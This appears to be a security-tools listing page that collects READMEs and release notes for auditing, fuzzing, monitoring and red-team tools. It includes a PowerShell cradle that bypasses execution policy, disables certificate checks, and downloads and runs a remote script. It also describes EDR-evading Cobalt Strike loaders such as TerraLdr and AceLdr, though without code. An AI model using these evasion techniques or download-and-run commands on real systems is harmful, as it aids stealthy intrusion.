KRIe has been developed using CO-RE (Compile Once - Run Everywhere) so that it is compatible with a large range of kernel versions. If your kernel doesn't export its BTF debug information, KRIe will try to download it automatically from BTFHub. If your kernel isn't available on BTFHub, but you have been able to manually generate your kernel's BTF data, you can provide it in the configuration file (see below).


System requirements

This project was developed on Ubuntu Focal 20.04 (Linux Kernel 5.15) and has been tested on older releases down to Ubuntu Bionic 18.04 (Linux Kernel 4.15).

  • golang 1.18+
  • (optional) Kernel headers are expected to be installed in /lib/modules/$(uname -r); update the Makefile with their location otherwise.
  • (optional) clang & llvm 14.0.6+

Optional fields are required to recompile the eBPF programs.

Build

  1. Since KRIe was built using CO-RE, you shouldn't need to rebuild the eBPF programs. That said, if you still want to rebuild them, you can use the following command:
# ~ make build-ebpf
  2. To build KRIe, run:
# ~ make build
  3. To install KRIe (copy to /usr/bin/krie) run:
# ~ make install

Getting started

KRIe needs to run as root. Run sudo krie -h to get help.

# ~ krie -h
Usage:
krie [flags]

Flags:
--config string KRIe config file (default "./cmd/krie/run/config/default_config.yaml")
-h, --help help for krie

Configuration

## Log level, options are: panic, fatal, error, warn, info, debug or trace
log_level: debug

## JSON output file, leave empty to disable JSON output.
output: "/tmp/krie.json"

## BTF information for the current kernel in .tar.xz format (required only if KRIE isn't able to locate it by itself)
vmlinux: ""

## events configuration
events:
## action taken when an init_module event is detected
init_module: log

## action taken when an delete_module event is detected
delete_module: log

## action taken when a bpf event is detected
bpf: log

## action taken when a bpf_filter event is detected
bpf_filter: log

## action taken when a ptrace event is detected
ptrace: log

## action taken when a kprobe event is detected
kprobe: log

## action taken when a sysctl event is detected
sysctl:
action: log

## Default settings for sysctl programs (kernel 5.2+ only)
sysctl_default:
block_read_access: false
block_write_access: false

## Custom settings for sysctl programs (kernel 5.2+ only)
sysctl_parameters:
kernel/yama/ptrace_scope:
block_write_access: true
kernel/ftrace_enabled:
override_input_value_with: "1\n"

## action taken when a hooked_syscall_table event is detected
hooked_syscall_table: log

## action taken when a hooked_syscall event is detected
hooked_syscall: log

## kernel_parameter event configuration
kernel_parameter:
action: log
periodic_action: log
ticker: 1 # sends at most one event every [ticker] second(s)
list:
- symbol: system/kprobes_all_disarmed
expected_value: 0
size: 4
# - symbol: system/selinux_state
# expected_value: 256
# size: 2

# sysctl
- symbol: system/ftrace_dump_on_oops
expected_value: 0
size: 4
- symbol: system/kptr_restrict
expected_value: 0
size: 4
- symbol: system/randomize_va_space
expected_value: 2
size: 4
- symbol: system/stack_tracer_enabled
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_clone
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_apparmor_policy
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_bpf_disabled
expected_value: 1
size: 4
- symbol: system/ptrace_scope
expected_value: 2
size: 4
- symbol: system/sysctl_perf_event_paranoid
expected_value: 2
size: 4
- symbol: system/kexec_load_disabled
expected_value: 1
size: 4
- symbol: system/dmesg_restrict
expected_value: 1
size: 4
- symbol: system/modules_disabled
expected_value: 0
size: 4
- symbol: system/ftrace_enabled
expected_value: 1
size: 4
- symbol: system/ftrace_disabled
expected_value: 0
size: 4
- symbol: system/sysctl_protected_fifos
expected_value: 1
size: 4
- symbol: system/sysctl_protected_hardlinks
expected_value: 1
size: 4
- symbol: system/sysctl_protected_regular
expected_value: 2
size: 4
- symbol: system/sysctl_protected_symlinks
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_userfaultfd
expected_value: 0
size: 4

## action taken when a register_check fails on a sensitive kernel space hook point
register_check: log
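
A hedged sketch for consuming the JSON output configured above, assuming one JSON object per line in /tmp/krie.json; check the documentation for the actual event schema.

import json

with open("/tmp/krie.json") as f:
    for line in f:
        line = line.strip()
        if line:
            event = json.loads(line)   # one event per line (assumption)
            print(event)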

Documentation

License

  • The golang code is under Apache 2.0 License.
  • The eBPF programs are under the GPL v2 License.


I2P 2.1.0

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

PowerHuntShares - Audit Script Designed In Inventory, Analyze, And Report Excessive Privileges Configured On Active Directory Domains


PowerHuntShares is designed to automatically inventory, analyze, and report excessive privileges assigned to SMB shares on Active Directory domain-joined computers.
It is intended to help IAM and other blue teams gain a better understanding of their SMB share attack surface, and it provides data insights to naturally group related shares in order to streamline remediation efforts at scale.


It supports functionality to:

  • Authenticate using the current user context, a credential, or clear text user/password.
  • Discover accessible systems associated with an Active Directory domain automatically. It will also filter Active Directory computers based on available open ports.
  • Target a single computer, list of computers, or discovered Active Directory computers (default).
  • Collect SMB share ACL information from target computers using PowerShell.
  • Analyze collected Share ACL data.
  • Report summary reports and excessive privilege details in HTML and CSV file formats.

Excessive SMB share ACLs are a systemic problem and an attack surface that all organizations struggle with. The goal of this project is to provide a proof of concept that works towards building a better share collection and data insight engine that can help inform and prioritize remediation efforts.

Bonus Features:

  • Generate directory listing dump for configurable depth
  • Search for file types across discovered shares

I've also put together a short presentation outlining some of the common misconfigurations and strategies for prioritizing remediation here: https://www.slideshare.net/nullbind/into-the-abyss-evaluating-active-directory-smb-shares-on-scale-secure360-251762721

Vocabulary

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges
Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. All of these provide domain users access to the affected shares due to privilege inheritance issues. Note that there is a parameter that allows operators to add their own target groups.
Below is some additional background:

  • Everyone is a direct reference that applies to both unauthenticated and authenticated users. Typically only a null session is required to access those resources.
  • BUILTIN\Users contains Authenticated Users
  • Authenticated Users contains Domain Users on domain joined systems. That's why Domain Users can access a share when the share permissions have been assigned to "BUILTIN\Users".
  • Domain Users is a direct reference
  • Domain Users can also create up to 10 computer accounts by default that get placed in the Domain Computers group
  • Domain Users that have local administrative access to a domain joined computer can also impersonate the computer account.

Please Note: Share permissions can be overruled by NTFS permissions. Also, be aware that testing excluded share names containing the following keywords:

print$, prnproc$, printer, netlogon, and sysvol

High Risk Shares
In the context of this report, high risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes the shares

 wwwroot, inetpub, c$, and admin$   
However, additional exposures may exist that are not called out beyond that (a hedged sketch applying these definitions follows).
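
The sketch below applies the two definitions above to a CSV export, flagging ACEs granted to the broad groups and marking high risk share names. The file name and column headers ("ShareName", "IdentityReference") are hypothetical; adjust them to match the actual CSV output.

import csv

EXCESSIVE_GROUPS = {"everyone", "authenticated users", "builtin\\users",
                    "domain users", "domain computers"}
HIGH_RISK_SHARES = {"wwwroot", "inetpub", "c$", "admin$"}

with open("shares.csv") as f:
    for row in csv.DictReader(f):
        identity = row["IdentityReference"].lower()
        excessive = any(identity.endswith(g) for g in EXCESSIVE_GROUPS)
        high_risk = row["ShareName"].lower() in HIGH_RISK_SHARES
        if excessive or high_risk:
            print(row["ShareName"], row["IdentityReference"],
                  "HIGH RISK" if high_risk else "excessive")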

Setup Commands

Below is a list of commands that can be used to load PowerHuntShares into your current PowerShell session. Please note that one of these will have to be run each time PowerShell is run; it is not persistent.

# Bypass execution policy restrictions
Set-ExecutionPolicy -Scope Process Bypass

# Import module that exists in the current directory
Import-Module .\PowerHuntShares.psm1

or

# Reduce SSL operating level to support connection to github
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[Net.ServicePointManager]::SecurityProtocol =[Net.SecurityProtocolType]::Tls12

# Download and load PowerHuntShares.psm1 into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")

Example Commands

Important Note: All commands should be run as an unprivileged domain user.

.EXAMPLE 1: Run from a domain computer. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test

.EXAMPLE 2: Run from a domain computer with alternative domain credentials. Performs Active Directory computer discovery by default.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user

.EXAMPLE 3: Run from a domain computer as current user. Target hosts in a file. One per line.
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -HostList c:\temp\hosts.txt

.EXAMPLE 4: Run from a non-domain computer with credential. Performs Active Directory computer discovery by default.
C:\temp\test> runas /netonly /user:domain\user PowerShell.exe
PS C:\temp\test> Import-Module Invoke-HuntSMBShares.ps1
PS C:\temp\test> Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Credential domain\user

===============================================================
PowerHuntShares
===============================================================
This function automates the following tasks:

o Determine current computer's domain
o Enumerate domain computers
o Filter for computers that respond to ping requests
o Filter for computers that have TCP 445 open and accessible
o Enumerate SMB shares
o Enumerate SMB share permissions
o Identify shares with potentially excessive privileges
o Identify shares that provide read & write access
o Identify shares that are high risk
o Identify common share owners, names, & directory listings
o Generate creation, last written, & last accessed timelines
o Generate html summary report and detailed csv files

Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
---------------------------------------------------------------
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems.
[*][03/01/2021 09:37] Scan Complete
---------------------------------------------------------------
SHARE ANALYSIS
---------------------------------------------------------------
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems.
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
---------------------------------------------------------------
SHARE REPORT SUMMARY
---------------------------------------------------------------
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] Run time: 00:02:23.2759086
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37] because 49 systems had open ports and there are typically two default shares.
[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs were found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37] - 4 backup
[*][03/01/2021 09:37] - 2 ssms
[*][03/01/2021 09:37] - 1 test2
[*][03/01/2021 09:37] - 1 test1
[*][03/01/2021 09:37] - 1 users
[*] -----------------------------------------------

HTML Report Examples

Credits

Author
Scott Sutherland (@_nullbind)

Open-Source Code Used
These individuals wrote open source code that was used as part of this project. A big thank you goes out to them for their work!

Name Site
Will Schroeder (@harmj0y) https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Warren F (@pscookiemonster) https://github.com/RamblingCookieMonster/Invoke-Parallel
Luben Kirov http://www.gi-architects.co.uk/2016/02/powershell-check-if-ip-or-subnet-matchesfits/

License
BSD 3-Clause

Todos

Pending Fixes/Bugs

  • Update code to avoid Defender
  • Fix file listing formatting on data insight pages
  • IPv6 addresses don't show up in subnets summary
  • ACLs associated with Builtin\Users sometimes show up as LocalSystem under undefined conditions and, as a result, don't show up in the Excessive Privileges export. - Thanks Sam!

Pending Features

  • Add ability to specify additional groups to target
  • Add directory listing to insights page.
  • Add ability to grab system OS information for data insights.
  • Add visualization: visual squares with coloring mapped to share volume density by subnet or IP?
  • Add file type search (half coded) + add to data insights. Don't forget things like *.aws, *.azure, *.gcp directories that store cloud credentials.
  • Add file content search.
  • Add DontExcludePrintShares option
  • Add auto targeting of groups that contain a large % of the user population; over 70% (make configurable). Add as option.
  • Add configuration fix: for netlogon and sysvol you may get access denied when using Windows 10 unless the setting below is configured. Automate a check for this, and attempt to modify it if privileges are at the correct level. In gpedit.msc, go to Computer -> Administrative Templates -> Network -> Network Provider -> Hardened UNC Paths, enable the policy and click the "Show" button. Enter your server name (* for all servers) into "Value name" and enter the following text "RequireMutualAuthentication=0,RequireIntegrity=0,RequirePrivacy=0" without quotes into the "Value" field.
  • Add interesting shares (based on names) to data insights; examples: sql, backup, password, etc.
  • Add active sessions data to help identify potential owners/users of share.
  • Pull spns and computer description/spn account descriptions to help identify owner/business unit.
  • Create bloodhound import file / edge (highrisk share)
  • Research to identify additional high risk share names based on common technology
  • Add better support for IPv6
  • Dynamic identification of spikes in high risk share creation/common groupings; need to better summarize supporting detail beyond just the timeline. For each of the data insights, add the average number of shares created for the insight grouping by year/month (for folder hash/name etc.) and the increase in the month/year it spikes (attempt to provide some historical context); maybe even list the most common non-default directories being used by each of those. Potentially add a "first seen date" as well.
  • Add showing share permissions (along with the already displayed NTFS permissions) and resultant access (most restrictive wins)


Zeek 5.0.5

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

TerraLdr - A Payload Loader Designed With Advanced Evasion Features


TerraLdr: A Payload Loader Designed With Advanced Evasion Features

Details:

  • no crt functions imported
  • syscall unhooking using KnownDllUnhook
  • api hashing using Rotr32 hashing algo
  • payload encryption using rc4 - payload is saved in .rsrc
  • process injection - targeting 'SettingSyncHost.exe'
  • ppid spoofing & blockdlls policy using NtCreateUserProcess
  • stealthy remote process injection - chunking
  • using debugging & NtQueueApcThread for payload execution

Usage:

Thanks For:

Notes:

  • "SettingSyncHost.exe" isnt found on windows 11 machine, while i didnt tested with w11, its a must to change the process name to something else before testing
  • it is possibly better to compile with "ISO C++20 Standard (/std:c++20)"

Profit:

Demo (by @ColeVanlanding1) :


Tested with Cobalt Strike && Havoc on Windows 10



tcpdump 4.99.2

tcpdump allows you to dump the traffic on a network. It can be used to print out the headers and/or contents of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect many attacks, or to monitor the network activities.

GNUnet P2P Framework 0.19.2

GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service built on top of the framework is anonymous file sharing.

cryptmount Filesystem Manager 6.2.0

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

YATAS - A Simple Tool To Audit Your AWS Infrastructure For Misconfiguration Or Potential Security Issues With Plugins Integration


Yet Another Testing & Auditing Solution

The goal of YATAS is to help you create a secure AWS environment without too much hassle. It won't check for all best practices but only for the ones that are important for you based on my experience. Please feel free to tell me if you find something that is not covered.


Features

YATAS is a simple and easy to use tool to audit your infrastructure for misconfiguration or potential security issues.


Installation

brew tap padok-team/tap
brew install yatas
yatas --init

Modify .yatas.yml to your needs.

yatas --install

Installs the plugins you need.

Usage

yatas -h

Flags:

  • --details: Show details of the issues found.
  • --compare: Compare the results of the previous run with the current run and show the differences.
  • --ci: Exit code 1 if there are issues found, 0 otherwise.
  • --resume: Only shows the number of tests passing and failing.
  • --time: Shows the time each test took to run in order to help you find bottlenecks.
  • --init: Creates a .yatas.yml file in the current directory.
  • --install: Installs the plugins you need.
  • --only-failure: Only show the tests that failed.

Plugins

Plugins Description Checks
AWS Audit AWS checks Good practices and security checks
Markdown Reports Reporting Generates a markdown report

Checks

Ignore results for known issues

You can ignore results of checks by adding the following to your .yatas.yml file:

ignore:
  - id: "AWS_VPC_004"
    regex: true
    values:
      - "VPC Flow Logs are not enabled on vpc-.*"
  - id: "AWS_VPC_003"
    regex: false
    values:
      - "VPC has only one gateway on vpc-08ffec87e034a8953"

Exclude a test

You can exclude a test by adding the following to your .yatas.yml file:

plugins:
  - name: "aws"
    enabled: true
    description: "Check for AWS good practices"
    exclude:
      - AWS_S3_001

Specify which tests to run

To only run a specific test, add the following to your .yatas.yml file:

plugins:
  - name: "aws"
    enabled: true
    description: "Check for AWS good practices"
    include:
      - "AWS_VPC_003"
      - "AWS_VPC_004"

Get error logs

You can get the error logs by adding the following to your env variables:

export YATAS_LOG_LEVEL=debug

The available log levels are: debug, info, warn, error, fatal, and panic; logging is off by default.

AWS - 63 Checks

AWS Certificate Manager

  • AWS_ACM_001 ACM certificates are valid
  • AWS_ACM_002 ACM certificate expires in more than 90 days
  • AWS_ACM_003 ACM certificates are used

APIGateway

  • AWS_APG_001 ApiGateways logs are sent to Cloudwatch
  • AWS_APG_002 ApiGateways are protected by an ACL
  • AWS_APG_003 ApiGateways have tracing enabled

AutoScaling

  • AWS_ASG_001 Autoscaling maximum capacity is below 80%
  • AWS_ASG_002 Autoscaling groups are in two availability zones

Backup

  • AWS_BAK_001 EC2's Snapshots are encrypted
  • AWS_BAK_002 EC2's snapshots are younger than a day old

Cloudfront

  • AWS_CFT_001 Cloudfronts enforce TLS 1.2 at least
  • AWS_CFT_002 Cloudfronts only allow HTTPS or redirect to HTTPS
  • AWS_CFT_003 Cloudfronts queries are logged
  • AWS_CFT_004 Cloudfronts are logging Cookies
  • AWS_CFT_005 Cloudfronts are protected by an ACL

CloudTrail

  • AWS_CLD_001 Cloudtrails are encrypted
  • AWS_CLD_002 Cloudtrails have Global Service Events Activated
  • AWS_CLD_003 Cloudtrails are in multiple regions

COG

  • AWS_COG_001 Cognito allows unauthenticated users

DynamoDB

  • AWS_DYN_001 Dynamodbs are encrypted
  • AWS_DYN_002 Dynamodb have continuous backup enabled with PITR

EC2

  • AWS_EC2_001 EC2s don't have a public IP
  • AWS_EC2_002 EC2s have the monitoring option enabled

ECR

  • AWS_ECR_001 ECR images are scanned on push
  • AWS_ECR_002 ECRs are encrypted
  • AWS_ECR_003 ECRs tags are immutable

EKS

  • AWS_EKS_001 EKS clusters have logging enabled
  • AWS_EKS_002 EKS clusters have private endpoint or strict public access

LoadBalancer

  • AWS_ELB_001 ELB have access logs enabled

GuardDuty

  • AWS_GDT_001 GuardDuty is enabled in the account

IAM

  • AWS_IAM_001 IAM Users have 2FA activated
  • AWS_IAM_002 IAM access key younger than 90 days
  • AWS_IAM_003 IAM User can't elevate rights
  • AWS_IAM_004 IAM Users have not used their password for 120 days

Lambda

  • AWS_LMD_001 Lambdas are private
  • AWS_LMD_002 Lambdas are in a security group
  • AWS_LMD_003 Lambdas are not with errors

RDS

  • AWS_RDS_001 RDS are encrypted
  • AWS_RDS_002 RDS are backed up automatically with PITR
  • AWS_RDS_003 RDS have minor versions automatically updated
  • AWS_RDS_004 RDS aren't publicly accessible
  • AWS_RDS_005 RDS logs are exported to cloudwatch
  • AWS_RDS_006 RDS have the deletion protection enabled
  • AWS_RDS_007 Aurora Clusters have minor versions automatically updated
  • AWS_RDS_008 Aurora RDS are backed up automatically with PITR
  • AWS_RDS_009 Aurora RDS have the deletion protection enabled
  • AWS_RDS_010 Aurora RDS are encrypted
  • AWS_RDS_011 Aurora RDS logs are exported to cloudwatch
  • AWS_RDS_012 Aurora RDS aren't publicly accessible

S3 Bucket

  • AWS_S3_001 S3 are encrypted
  • AWS_S3_002 S3 buckets are not global but in one zone
  • AWS_S3_003 S3 buckets are versioned
  • AWS_S3_004 S3 buckets have a retention policy
  • AWS_S3_005 S3 buckets have public access block enabled

Volume

  • AWS_VOL_001 EC2's volumes are encrypted
  • AWS_VOL_002 EC2 are using GP3
  • AWS_VOL_003 EC2 have snapshots
  • AWS_VOL_004 EC2's volumes are unused

VPC

  • AWS_VPC_001 VPC CIDRs are bigger than /20
  • AWS_VPC_002 VPC can't be in the same account
  • AWS_VPC_003 VPC only have one Gateway
  • AWS_VPC_004 VPC Flow Logs are activated
  • AWS_VPC_005 VPC have at least 2 subnets

How to create a new plugin?

Would you like to add a new plugin? Then simply visit yatas-plugin and follow the instructions.



AceLdr - Cobalt Strike UDRL For Memory Scanner Evasion


A position-independent reflective loader for Cobalt Strike. Zero results from Hunt-Sleeping-Beacons, BeaconHunter, BeaconEye, Patriot, Moneta, PE-sieve, or MalMemDetect.


Features

Easy to Use

Import a single CNA script before generating shellcode.

Dynamic Memory Encryption

Creates a new heap for any allocations from Beacon and encrypts entries before sleep.

Code Obfuscation and Encryption

Changes the memory containing CS executable code to non-executable and encrypts it (FOLIAGE).

Return Address Spoofing at Execution

Certain WinAPI calls are executed with a spoofed return address (InternetConnectA, NtWaitForSingleObject, RtlAllocateHeap).

Sleep Without Sleep

Delayed execution using WaitForSingleObjectEx.

RC4 Encryption

All encryption performed with SystemFunction032.

Known Issues

  • Not compatible with loaders that rely on the shellcode thread staying alive.

References

This project would not have been possible without the following:

Other features and inspiration were taken from the following:



REST-Attacker - Designed As A Proof-Of-Concept For The Feasibility Of Testing Generic Real-World REST Implementations


REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.

REST-Attacker is maintained by the Chair of Network & Data Security of Ruhr University Bochum.


Features

REST-Attacker currently provides these features:

  • Automated generation of tests
    • Utilize an OpenAPI description to automatically generate test runs (see the sketch after this list)
    • 32 integrated security tests based on OWASP and other scientific contributions
    • Built-in creation of security reports
  • Streamlined API communication
    • Custom request interface for the REST security use case (based on the Python3 requests module)
    • Communicate with any generic REST API
  • Handling of access control
    • Background authentication/authorization with API
    • Support for the most popular access control mechanisms: OAuth2, HTTP Basic Auth, API keys and more
  • Easy to use & extend
    • Usable as standalone (CLI) tool or as a module
    • Adapt test runs to specific APIs with extensive configuration options
    • Create custom test cases or access control schemes with the tool's interfaces
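
As a rough sketch of the load-time generation idea referenced in the feature list above (this is not REST-Attacker's actual interface, just a minimal Python illustration), enumerating the operations of an OpenAPI 3 description in JSON form could look like this:

import json

HTTP_METHODS = {"get", "put", "post", "delete", "patch", "head", "options"}

def operations_from_openapi(spec_path):
    """Yield (METHOD, path) pairs for every operation in an OpenAPI description."""
    with open(spec_path) as fh:
        spec = json.load(fh)
    for path, item in spec.get("paths", {}).items():
        for method in item:
            if method in HTTP_METHODS:
                yield method.upper(), path

# Each (METHOD, path) pair can then be matched against applicable test cases
# (e.g. scopes.* or resources.* checks) to build the actual test runs.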

Install

Get the tool by downloading or cloning the repository:

git clone https://github.com/RUB-NDS/REST-Attacker.git

You need Python 3.10 or newer to run the tool.

You also need to install the following packages with pip:

python3 -m pip install -r requirements.txt

Quickstart

Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and on the available configuration options in our usage guides.

Get the list of supported test cases:

python3 -m rest_attacker --list

Basic test run (with load-time test case generation):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate

Full test run (with load-time and runtime test case generation + rate limit handling):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits

Test run with only selected test cases (only generates test runs for the test cases scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):

python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters

Rerun a test run from a report:

python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json

Documentation

Usage guides and configuration format documentation can be found in the documentation subfolders.

Troubleshooting

For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.

Contributing

Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code amendments via a pull request.

Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.

License

This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.



American Fuzzy Lop plus plus 4.05c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork of Google's afl, with more speed, more and better mutations, more and better instrumentation, custom module support, etc.

DotDumper - An Automatic Unpacker And Logger For DotNet Framework Targeting Files


An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022.

The automatic detection and classification of any given file in a reliable manner is often considered the holy grail of malware analysis. The trials and tribulations to get there are plenty, which is why the creation of such a system is held in high regard. When it comes to DotNet targeting binaries, our new open-source tool DotDumper aims to assist in several of the crucial steps along the way: logging (in-memory) activity, dumping interesting memory segments, and extracting characteristics from the given sample.


Why DotDumper?

In brief, manual unpacking is a tedious process which consumes a disproportionate amount of time for analysts. Obfuscated binaries further increase the time an analyst must spend to unpack a given file. When scaling this, organizations need numerous analysts who dissect malware daily, likely in combination with a scalable sandbox. The lost valuable time could be used to dig into interesting campaigns or samples to uncover new threats, rather than the mundane generic malware that is widely spread. After all, analysts look for the few needles in the haystack.

So, what difference does DotDumper make? Running a DotNet based malware sample via DotDumper provides log files of crucial, contextualizing, and common function calls in three formats (human readable plaintext, JSON, and XML), as well as copies from useful in-memory segments. As such, an analyst can skim through the function call log. Additionally, the dumped files can be scanned to classify them, providing additional insight into the malware sample and the data it contains. This cuts down on time vital to the triage and incident response processes, and frees up SOC analyst and researcher time for more sophisticated analysis needs.

Features

To log and dump the contextualizing function calls and their results, DotDumper uses a mixture of reflection and managed hooks, all written in pure C#. Below, key features will be highlighted and elaborated upon, in combination with excerpts of DotDumper’s results of a packed AgentTesla stealer sample, the hashes of which are below.

Hash type Hash value
SHA-256 b7512e6b8e9517024afdecc9e97121319e7dad2539eb21a79428257401e5558d
SHA-1 c10e48ee1f802f730f41f3d11ae9d7bcc649080c
MD-5 23541daadb154f1f59119952e7232d6b

Using the command-line interface

DotDumper is accessible through a command-line interface, with a variety of arguments. The image below shows the help menu. Note that not all arguments will be discussed, but rather the most used ones.

The minimal requirement to run a given sample is to provide the β€œ-file” argument, along with a file name or file path. If a full path is given, it is used. If a file name is given, the current working directory is checked, as well as the folder of DotDumper’s executable location.

